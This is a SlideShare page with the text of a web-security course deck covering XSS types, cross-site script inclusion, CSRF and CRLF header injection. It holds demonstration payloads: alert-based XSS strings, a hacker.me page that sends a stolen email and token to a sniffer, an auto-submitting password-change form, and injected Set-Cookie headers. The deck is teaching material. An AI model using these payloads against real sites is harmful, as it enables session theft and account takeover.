SlideShare ist ein Scribd-Unternehmen logo

Client side

Михаил Фирстов
Михаил Фирстов

Part of course.

Bildung
1 von 32
Downloaden Sie, um offline zu lesen
Client Side
XSS Cross Site Scripting
WTF is XSS? ... <body> Hello, <h1>1</h1> </body> ... /hi.php?me=<h1>1</h1> User input cause html/js injection or script evaluating ... <script> var user = eval(location.hash.slice(1)) </script> ... /hi.php#alert(1337); ... <img src="1" onerror="alert(1)"> ... /img.php?u=1" onerror="alert(1) ... <div id='content'> <?php readfile($_GET['id']); ?> </div> ... /user.php?id=1337 <script>alert(1);</script> /1337.txt
Stored XSS Payload saved at server's DB/FS and will eval every time user visit malicious page ... <div id='content'> <?php readfile($_GET['id']); ?> </div> ... /user.php <script>alert(1);</script> /1337.txt ?id=1337
Stored XSS Payload saved at server's DB/FS and will eval every time user visit malicious page ... <div id='content'> </div> ... /user.php?id=1337 <script>alert(1);</script> /1337.txt (HTML response)
Stored XSS
Reflected XSS Payload injects in page from user's request /hi.php?me=<h1>1</h1> ... <body> Hello, <h1>1</h1> </body> ... /hi.php?me=<h1>1</h1> (HTML response) Clear HTML-code injection:
Reflected XSS Payload injects in page from user's request Clear HTML-code injection:
Reflected XSS Payload injects in page from user's request /img.php?u=1" onerror="alert(1) (HTML response) Injection in tag attribute: ... <img src="1" onerror="alert(1)"> ... /img.php?u=1" onerror="alert(1)
Reflected XSS Payload injects in page from user's request Injection in tag attribute:
DOM XSS JS executes our payload ... <script> var user = eval(location.hash.slice(1)) </script> ... /hi.php#alert(1337); /hi.php#alert(1337); eval(alert(1337));
DOM XSS JS executes our payload
What can XSS? • HTTP/S Requests via ajax (CORS/SOP!!!) • Page hijacking • Form grabber / input logger • Man-in-The-Browser • XSS worm via stored xss • etc (see BeEF) scheme, hostname, port
XSSI Cross Site Scripting Inclusion
WTF is "XSSI"? var user_mail = 'user@test.com'; var secret_token = '63a9f0ea7bb98050796b649e85481845'; ... social.net/me.js Example 1: dynamic js scripts
Example 1 var user_mail = '%user_mail_here%'; var secret_token = '%token_here%'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users
Example 1 var user_mail = '%user_mail_here%'; var secret_token = '%token_here%'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Open hacker's website with evil script
Example 1 var user_mail = '%user_mail_here%'; var secret_token = '%token_here%'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Browser loads script from social.net/me.js with live user's session on social.net Cookie: ...
Example 1 var user_mail = 'user@test.com'; var secret_token = '63a9f0ea7bb98050796b649e85481845'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Dynamic script with user's data in vars will be execute in user's browser on hacker.me/test.html
Example 1 var user_mail = 'user@test.com'; var secret_token = '63a9f0ea7bb98050796b649e85481845'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Now JS can access this vars and send them to hacker's log!
Example 2: JSONP pewpew({"name":"user@test.com", "secret_token" : "63a9f0ea7bb98050796b649e85481845"}) social.net/me.php?cb=pewpew Same as example 1 with JSONP
Example 2 pewpew({"name":"user@test.com", "secret_token" : "63a9f0ea7bb98050796b649e85481845"}) social.net/me.php?cb=pewpew <script> pewpew = function(i){ send_to_sniffer(i.name+i.secret_token); } </script> <script src="//social.net/me.php?cb=pewpew"> </script> hacker.me/test.htm Write your own function!
CSRF Cross Site Request Forgery
WTF is "CSRF"? <body onload="document.forms[0].submit()"> <form method="GET" action="//social.net/settings"> <input name="type" value="password"> <input name="pass" value="qwerty123"> </form> ... hacker.site/1.html GET /settings?type=password&pass=qwerty123 HTTP/1.1 Host: social.net Cookie: username=user1; ... ...
CSRF attack plan • Server has no uniq tokens per request/user/ session and no "referer" checks • Create form with filled inputs and autosubmit • Gave link to authenticated user • He opens link, form submits and browser make crafted by hacker request
CSRF example Real-life example. CSRF in password change processing
HTTP Response Splitting or CRLF injection
WTF is "CRLF"? CR - Carriage Return LF - Line Feed CRLF means end-of-line in HTTP packets CRLF in bytes - %0d%0a or rn POST / HTTP/1.1[CRLF] Host: www.example.com[CRLF] User-Agent: Mozilla/5.0[CRLF] Accept: text/html[CRLF] Accept-Language: en-us,en;q=0.5[CRLF] Accept-Encoding: gzip, deflate[CRLF] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF] Connection: keep-alive[CRLF][CRLF] data=pawpaw Typical HTTP request:
WTF is "CRLF"? CR - Carriage Return LF - Line Feed CRLF means end-of-line in HTTP packets CRLF in bytes - %0d%0a or rn HTTP/1.1 200 OK[CRLF] Host: www.example.com[CRLF] Connection: close[CRLF] X-Powered-By: PHP/5.5.31[CRLF] Content-type: text/html[CRLF][CRLF] page<h1>content</h1>here Typical HTTP response:
WTF is "CRLF"? What if we can inject in HTTP headers? GET /?content_type=text/html HTTP/1.1 Host: 127.0.0.1:8081 ... HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.11 Content-type: text/html <html> ...
WTF is "CRLF"? Modify headers as you want, add new header for example: GET /?content_type=text/html%0d%0aSet-Cookie: a=b; HTTP/1.1 Host: 127.0.0.1:8081 ... HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.11 Content-type: text/html Set-Cookie: a=b <html> ... [CRLF]
WTF is "CRLF"? Just add double [CRLF] to rewrite page content! GET /?content_type=text/html%0d%0a%0d%0a<h1>1<!-- HTTP/1.1 Host: 127.0.0.1:8081 ... HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.11 Content-type: text/html <h1>1<!-- <html> [CRLF][CRLF]

Empfohlen

Synapse india dotnet development web approch part 2
Synapse india dotnet development web approch part 2Synapse india dotnet development web approch part 2
Synapse india dotnet development web approch part 2
Synapseindiappsdevelopment
 
Security in Node.JS and Express:
Security in Node.JS and Express:Security in Node.JS and Express:
Security in Node.JS and Express:
Petros Demetrakopoulos
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
Building Your First Data Science Applicatino in MongoDB
Building Your First Data Science Applicatino in MongoDBBuilding Your First Data Science Applicatino in MongoDB
Building Your First Data Science Applicatino in MongoDB
MongoDB
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
iMasters
 
"Auth for React.js APP", Nikita Galkin
"Auth for React.js APP", Nikita Galkin"Auth for React.js APP", Nikita Galkin
"Auth for React.js APP", Nikita Galkin
Fwdays
 
FwDays 2021: Metarhia Technology Stack for Node.js
FwDays 2021: Metarhia Technology Stack for Node.jsFwDays 2021: Metarhia Technology Stack for Node.js
FwDays 2021: Metarhia Technology Stack for Node.js
Timur Shemsedinov
 

Empfohlen

Synapse india dotnet development web approch part 2
Synapse india dotnet development web approch part 2Synapse india dotnet development web approch part 2
Synapse india dotnet development web approch part 2
Synapseindiappsdevelopment
 
Security in Node.JS and Express:
Security in Node.JS and Express:Security in Node.JS and Express:
Security in Node.JS and Express:
Petros Demetrakopoulos
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
Building Your First Data Science Applicatino in MongoDB
Building Your First Data Science Applicatino in MongoDBBuilding Your First Data Science Applicatino in MongoDB
Building Your First Data Science Applicatino in MongoDB
MongoDB
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
iMasters
 
"Auth for React.js APP", Nikita Galkin
"Auth for React.js APP", Nikita Galkin"Auth for React.js APP", Nikita Galkin
"Auth for React.js APP", Nikita Galkin
Fwdays
 
FwDays 2021: Metarhia Technology Stack for Node.js
FwDays 2021: Metarhia Technology Stack for Node.jsFwDays 2021: Metarhia Technology Stack for Node.js
FwDays 2021: Metarhia Technology Stack for Node.js
Timur Shemsedinov
 
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
async_io
 
Architecting Secure and Compliant Applications with MongoDB
Architecting Secure and Compliant Applications with MongoDB Architecting Secure and Compliant Applications with MongoDB
Architecting Secure and Compliant Applications with MongoDB
MongoDB
 
Introduction to Greasemonkey
Introduction to GreasemonkeyIntroduction to Greasemonkey
Introduction to Greasemonkey
Gurpreet Singh Sachdeva
 
mjs
mjsmjs
mjs
Ivan Elkin
 
Css
CssCss
Css
bismasheikh3
 
Creating a Java EE 7 Websocket Chat Application
Creating a Java EE 7 Websocket Chat ApplicationCreating a Java EE 7 Websocket Chat Application
Creating a Java EE 7 Websocket Chat Application
Micha Kops
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
GeeksLab Odessa
 
"The little big project. From zero to hero in two weeks with 3 front-end engi...
"The little big project. From zero to hero in two weeks with 3 front-end engi..."The little big project. From zero to hero in two weeks with 3 front-end engi...
"The little big project. From zero to hero in two weeks with 3 front-end engi...
Fwdays
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks
Felipe Prado
 
Lecture8 php page control by okello erick
Lecture8 php page control by okello erickLecture8 php page control by okello erick
Lecture8 php page control by okello erick
okelloerick
 
JSON Web Token
JSON Web TokenJSON Web Token
JSON Web Token
Deddy Setyadi
 
Jsp session tracking
Jsp session trackingJsp session tracking
Jsp session tracking
rvarshneyp
 
DEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menace
DEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menaceDEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menace
DEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menace
Felipe Prado
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
Ken Belva
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Node.js Stream API
Node.js Stream APINode.js Stream API
Node.js Stream API
The Software House
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentation
reza jalaluddin
 
Ruby on rails security guide
Ruby on rails security guide Ruby on rails security guide
Ruby on rails security guide
Randall Valenciano Fallas
 
KEYNOTE: Node.js interactive 2017 - The case for node.js
KEYNOTE: Node.js interactive 2017 - The case for node.jsKEYNOTE: Node.js interactive 2017 - The case for node.js
KEYNOTE: Node.js interactive 2017 - The case for node.js
Justin Beckwith
 
Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web Tokens
Jonathan LeBlanc
 
LFI
LFILFI
LFI
Михаил Фирстов
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-Injection
Михаил Фирстов
 

Weitere ähnliche Inhalte

Was ist angesagt?

WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
GeeksLab Odessa
 
"The little big project. From zero to hero in two weeks with 3 front-end engi...
"The little big project. From zero to hero in two weeks with 3 front-end engi..."The little big project. From zero to hero in two weeks with 3 front-end engi...
"The little big project. From zero to hero in two weeks with 3 front-end engi...
Fwdays
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentation
reza jalaluddin
 

Was ist angesagt? (20)

Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
 
Architecting Secure and Compliant Applications with MongoDB
Architecting Secure and Compliant Applications with MongoDB Architecting Secure and Compliant Applications with MongoDB
Architecting Secure and Compliant Applications with MongoDB
 
Introduction to Greasemonkey
Introduction to GreasemonkeyIntroduction to Greasemonkey
Introduction to Greasemonkey
 
mjs
mjsmjs
mjs
 
Css
CssCss
Css
 
Creating a Java EE 7 Websocket Chat Application
Creating a Java EE 7 Websocket Chat ApplicationCreating a Java EE 7 Websocket Chat Application
Creating a Java EE 7 Websocket Chat Application
 
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...
 
"The little big project. From zero to hero in two weeks with 3 front-end engi...
"The little big project. From zero to hero in two weeks with 3 front-end engi..."The little big project. From zero to hero in two weeks with 3 front-end engi...
"The little big project. From zero to hero in two weeks with 3 front-end engi...
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks
 
Lecture8 php page control by okello erick
Lecture8 php page control by okello erickLecture8 php page control by okello erick
Lecture8 php page control by okello erick
 
JSON Web Token
JSON Web TokenJSON Web Token
JSON Web Token
 
Jsp session tracking
Jsp session trackingJsp session tracking
Jsp session tracking
 
DEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menace
DEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menaceDEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menace
DEF CON 27 - ALVARO MUNOZ / OLEKSANDR MIROSH - sso wars the token menace
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Node.js Stream API
Node.js Stream APINode.js Stream API
Node.js Stream API
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentation
 
Ruby on rails security guide
Ruby on rails security guide Ruby on rails security guide
Ruby on rails security guide
 
KEYNOTE: Node.js interactive 2017 - The case for node.js
KEYNOTE: Node.js interactive 2017 - The case for node.jsKEYNOTE: Node.js interactive 2017 - The case for node.js
KEYNOTE: Node.js interactive 2017 - The case for node.js
 
Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web Tokens
 

Andere mochten auch

Http Response Splitting
Http Response SplittingHttp Response Splitting
Http Response Splitting
guestc27cd9
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 

Andere mochten auch (9)

LFI
LFILFI
LFI
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-Injection
 
Race condition
Race conditionRace condition
Race condition
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Attacking MongoDB
Attacking MongoDBAttacking MongoDB
Attacking MongoDB
 
Http Response Splitting
Http Response SplittingHttp Response Splitting
Http Response Splitting
 
Mongo db eng
Mongo db engMongo db eng
Mongo db eng
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 

Ähnlich wie Client side

"Your script just killed my site" by Steve Souders
"Your script just killed my site" by Steve Souders"Your script just killed my site" by Steve Souders
"Your script just killed my site" by Steve Souders
Dmitry Makarchuk
 
CONFidence 2014: Kiss, Zagon, Sseller: Scaling security
CONFidence 2014: Kiss, Zagon, Sseller: Scaling securityCONFidence 2014: Kiss, Zagon, Sseller: Scaling security
CONFidence 2014: Kiss, Zagon, Sseller: Scaling security
PROIDEA
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 

Ähnlich wie Client side (20)

W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Owasp & php
Owasp & phpOwasp & php
Owasp & php
 
"Your script just killed my site" by Steve Souders
"Your script just killed my site" by Steve Souders"Your script just killed my site" by Steve Souders
"Your script just killed my site" by Steve Souders
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Pushing the Web: Interesting things to Know
Pushing the Web: Interesting things to KnowPushing the Web: Interesting things to Know
Pushing the Web: Interesting things to Know
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
WCLA12 JavaScript
WCLA12 JavaScriptWCLA12 JavaScript
WCLA12 JavaScript
 
CONFidence 2014: Kiss, Zagon, Sseller: Scaling security
CONFidence 2014: Kiss, Zagon, Sseller: Scaling securityCONFidence 2014: Kiss, Zagon, Sseller: Scaling security
CONFidence 2014: Kiss, Zagon, Sseller: Scaling security
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Android and REST
Android and RESTAndroid and REST
Android and REST
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
soft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.jssoft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.js
 

Kürzlich hochgeladen

Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
fonyou31
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
discovermytutordmt
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
heathfieldcps1
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
QucHHunhnh
 

Kürzlich hochgeladen (20)

Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 

Client side

  • 3. WTF is XSS? ... <body> Hello, <h1>1</h1> </body> ... /hi.php?me=<h1>1</h1> User input cause html/js injection or script evaluating ... <script> var user = eval(location.hash.slice(1)) </script> ... /hi.php#alert(1337); ... <img src="1" onerror="alert(1)"> ... /img.php?u=1" onerror="alert(1) ... <div id='content'> <?php readfile($_GET['id']); ?> </div> ... /user.php?id=1337 <script>alert(1);</script> /1337.txt
  • 4. Stored XSS Payload saved at server's DB/FS and will eval every time user visit malicious page ... <div id='content'> <?php readfile($_GET['id']); ?> </div> ... /user.php <script>alert(1);</script> /1337.txt ?id=1337
  • 5. Stored XSS Payload saved at server's DB/FS and will eval every time user visit malicious page ... <div id='content'> </div> ... /user.php?id=1337 <script>alert(1);</script> /1337.txt (HTML response)
  • 7. Reflected XSS Payload injects in page from user's request /hi.php?me=<h1>1</h1> ... <body> Hello, <h1>1</h1> </body> ... /hi.php?me=<h1>1</h1> (HTML response) Clear HTML-code injection:
  • 8. Reflected XSS Payload injects in page from user's request Clear HTML-code injection:
  • 9. Reflected XSS Payload injects in page from user's request /img.php?u=1" onerror="alert(1) (HTML response) Injection in tag attribute: ... <img src="1" onerror="alert(1)"> ... /img.php?u=1" onerror="alert(1)
  • 10. Reflected XSS Payload injects in page from user's request Injection in tag attribute:
  • 11. DOM XSS JS executes our payload ... <script> var user = eval(location.hash.slice(1)) </script> ... /hi.php#alert(1337); /hi.php#alert(1337); eval(alert(1337));
  • 12. DOM XSS JS executes our payload
  • 13. What can XSS? • HTTP/S Requests via ajax (CORS/SOP!!!) • Page hijacking • Form grabber / input logger • Man-in-The-Browser • XSS worm via stored xss • etc (see BeEF) scheme, hostname, port
  • 15. WTF is "XSSI"? var user_mail = 'user@test.com'; var secret_token = '63a9f0ea7bb98050796b649e85481845'; ... social.net/me.js Example 1: dynamic js scripts
  • 16. Example 1 var user_mail = '%user_mail_here%'; var secret_token = '%token_here%'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users
  • 17. Example 1 var user_mail = '%user_mail_here%'; var secret_token = '%token_here%'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Open hacker's website with evil script
  • 18. Example 1 var user_mail = '%user_mail_here%'; var secret_token = '%token_here%'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Browser loads script from social.net/me.js with live user's session on social.net Cookie: ...
  • 19. Example 1 var user_mail = 'user@test.com'; var secret_token = '63a9f0ea7bb98050796b649e85481845'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Dynamic script with user's data in vars will be execute in user's browser on hacker.me/test.html
